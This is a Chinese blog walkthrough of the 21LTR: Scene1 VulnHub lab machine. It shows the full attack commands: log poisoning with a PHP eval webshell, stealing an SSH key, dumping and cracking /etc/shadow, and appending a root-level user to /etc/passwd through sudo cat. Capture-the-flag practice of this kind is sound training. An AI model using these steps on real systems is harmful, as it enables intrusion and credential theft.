vulnhub系列:21LTR:Scene1靶机

已于 2024-07-31 10:44:17 修改
阅读量347 收藏 3
点赞数 6
分类专栏: vulnhub系列 文章标签: web安全 网络安全
于 2024-07-29 21:44:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jq_j37/article/details/140782033
版权

21LTR:Scene1

靶机下载

一、配置环境

靶机为静态IP,192.168.2.120,因此kali也要改为同一网段

二、信息收集

nmap扫描,有21、22、80、10001端口开启

nmap 192.168.2.120 -p- -sV -Pn -O

02

看一下80端口

01

目录扫描,没什么发现

dirb http://192.168.2.120/

03

f12查看源码,发现一个账号密码

logs:zg]E-b0]+8:(58G

02

尝试用这个账号密码连接ssh,ssh连接失败,ftp连接成功

04

看到这里只有一个backup_log.php文件

05

下载到本地查看

get backup_log.php /home/kali/Desktop/1.php

06

查看发现是日志文件

07

那么可能在之前目录扫描的logs目录下,尝试访问

08

三、getshell

既然是php的日志文件,那么可以考虑将一句话写入日志中getshell,参考了一下其他文档,需要利用10001端口

telnet 192.168.2.120 10001

<?php @eval($_REQUEST['cmd']);?>

11

再次访问该文件,可以看到写入进去了

10

蚁剑连接成功

09

蚁剑连接后,可以查看一下敏感文件

查看/etc/passwd

13

因为有ssh服务,就读取一下密钥

12

将该文件保存到kali中

14

赋予权限,然后ssh登录

chmod 600 id_rsa

ssh -i id_rsa hbeale@192.168.2.120

15

四、提权

查看当前用户权限

sudo -l

16

可以通过cat提权,所以可以看/etc/shadow文件,或者写入文件

这里我选择读取shadow文件,破解密码

sudo cat /etc/shadow

17

将root用户的密码写入pass.txt,然后开始破解

john --wordlist=rockyou.txt pass.txt

18

得到密码为formula1,ssh连接root,权限被拒绝

19

权限拒绝应该是配置原因,那么只能写入高权限用户了

命令生成密码

openssl passwd 123456

20

然后依据/etc/passwd文件的格式写一个abab用户

abab:$1$J1DRKiec$c6CXi9UUFTMKwHS6lk3bI1:0:0:/root:/bin/bash

将abab用户写入到/etc/passwd

sudo /usr/bin/cat >> /etc/passwd

21

切换用户到abab,这里看到权限为root权限,提权成功

su abab

22

三天三夜睡不着
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF之21LTR Scene1 靶机渗透(日志信息,Wireshark抓包)
afei001
08-02 714
  练习环境     攻击机:kali     靶机21LTR: Scene1     下载地址:https://download.vulnhub.com/21ltrcom/21LTR.com_Scene1_2.120_v1.0.iso      1.发现靶机,端口扫描 root@kali:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.2.3 .
Vulnhub靶机渗透之21LTRvunlhub
2301_77039831的博客
10-17 241
到这里有两种思路,因为可以通过root的cat命令读取文件,所以可以看/etc/shadow,也可以写入该文件。由于是php的日志所以思路是想办法把一句话写入这个页面,看了下其他大佬的WP,得访问10001端口。接下来是方法二,因为可以读取shadow文件,所以试图将root的shadow文件的密码进行破解。连接后看下敏感文件,结合靶机有ssh服务,尝试读取密钥,发现可以读取。先创建一个文件,内容是root的加密密码,然后使用john解密。先nmap扫一下,发现有21,22,80端口。
21LTR: Scene 1靶机
m0_61995767的博客
07-30 540
21LTR: Scene 1打靶记录
Vulnhub靶机 21 LTR-Scene1(渗透测试详细)
2301_78721909的博客
07-30 341
Vulnhub靶机 21 LTR-Scene1详解(from wuhu)
21LTR:Scene1超详细靶机实战
weixin_68615160的博客
07-30 255
考虑到是日志文件,我们可以尝试将一句话木马写到日志文件中获取shell。读取密钥 /media/USB_1/Stuff/Keys/id_rsa。尝试用该账号连接ssh服务和ftp服务,成功连接ftp服务。我们想起来刚刚目录探测有一个logs目录,我们尝试访问。将newroot用户写入到/etc/passwd。发现不需要密码的只有cat命令,我们就用它去提权。我们F12查看页面源码可以发现一个用户和密码。考虑到有ssh服务,我们可以使用密钥免密登录。写入一个高权限用户到/etc/passwd。
Hack the 21LTR: Scene 1 VM (Boot to Root)
marcushbs的博客
08-21 386
靶机下载链接: https://www.vulnhub.com/entry/21ltr-scene-1,3/ 主机扫描: ╰─ nmap -p1-65535 -sV -sC -A 192.168.2.120 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-28 11:19 CSTNmap scan report for 192.168.2.120Host is up (0.0012s latency).Not shown: 65532 ...
21LTR-Scene靶机渗透测试
weixin_58786230的博客
07-30 366
【代码】21LTR-Scene靶机渗透测试。
ltr-rtl:LTR 和 RTL 实现演示以及测试
06-01
1. 解压"ltr-rtl-master"文件。 2. 查看HTML文件,了解其布局结构和`dir`属性的使用。 3. 阅读JavaScript代码,理解如何检测浏览器的语言环境,以及如何根据需要切换布局方向。 4. 分析CSS文件,查看如何编写适应...
LtR-Feature-Extractor:学习排名特征提取任务
04-28
每个查询通常由一个或多个关键词组成,LtR特征提取器会针对每个查询分析文档,生成一系列与查询相关的特征,如词项共现、TF-IDF值、位置信息等。 Indri索引是一种高效的信息检索系统,它能够快速地对大规模文本集合...
ltr-tools:一套用于学习排名的命令行工具
05-19
该项目同时包含ltr-tools cli和solr配置,以提供后端搜索功能。 该项目的主要范围将是提供有用的工具,以帮助“学习排名”集成和开发。 ltr-tools是一个命令行界面,用于运行一组实用程序任务,以可视化,调试和...
LTR-sim:长转录组阅读模拟器
04-22
《LTR-sim: 长转录组阅读模拟器详解》 在生物学研究领域,特别是基因组学和转录组学中,模拟器扮演着重要的角色。它们可以帮助研究人员理解和预测实验数据,验证分析方法的有效性,并优化实验设计。其中,“LTR-sim...
direction:检测方向
05-05
direction ( 'A' ) // => 'ltr' direction ( 'anglais' ) // => 'ltr' direction ( 'بسيطة' ) // => 'rtl' direction ( '@' ) // => 'neutral' 原料药 该软件包导出以下标识符: direction 。 没有默认导出。 ...
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 750
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
网络安全相关竞赛比赛
黑战士的博客
07-18 1411
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
网络安全防御【IPsec VPN搭建】
miss_copper的博客
07-25 1258
防火墙的g0/0/0口默认的IP地址为192.168.0.1/24;但是我们需要在浏览器中打开FW2的web服务就需要将g0/0/0接口的IP地址修改为192.168.142.40/24与我们Clound中虚拟网卡通一个网段才行。20、将双机热备改成主备模式,通过内网的VPN设备构建一条到达分公司的IPsec VPN通道,保证10.0.2.0/24网段可以访问到192.168.1.0/24网段。登录成功之后需要修改你的密码才能进入防火墙的用户视图。IPsec策略协商成功!成功修改为主备模式!
网络安全之不同阶段攻防手段(四)
子非渔
07-25 474
前面已经说过信息收集、扫描探测以及初始访问阶段的攻防手段,下面将说一下在攻击者获取到访问权限的情况下会接着如何进一步在网络中建立控制点、提权、横移以及完成攻击后的遗迹隐藏
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8357
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Java面试整理,涵盖基础、JVM、线程并发、框架、MySQL、微服务、Redis、中间件、数据结构与算法等。陆续完善中.zip
最新发布
07-31
Java面试整理,涵盖基础、JVM、线程并发、框架、MySQL、微服务、Redis、中间件、数据结构与算法等。陆续完善中
ModuleNotFoundError: No module named 'ltr'
09-10
根据您提供的引用内容,出现了"ModuleNotFoundError: No module named 'ltr'"错误。这个错误通常是因为您在导入模块时出现了问题。原因可能是您没有正确安装所需的模块或者导入模块的名称拼写有误。如果您确定已经正确安装了模块,并且仍然出现此错误,那么可以尝试以下解决方法。首先,检查模块是否已经正确安装。您可以在终端中使用"pip freeze"命令查看已安装的模块列表,并确保"ltr"模块在其中。如果没有找到该模块,可以使用"pip install ltr"命令安装。如果模块已经安装但仍然出现此错误,那么可能是导入模块时出现了拼写错误。请确保您在代码中正确地导入了"ltr"模块。如果问题仍然存在,可以尝试使用更具体的错误信息或查询相关文档以获取更多帮助。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值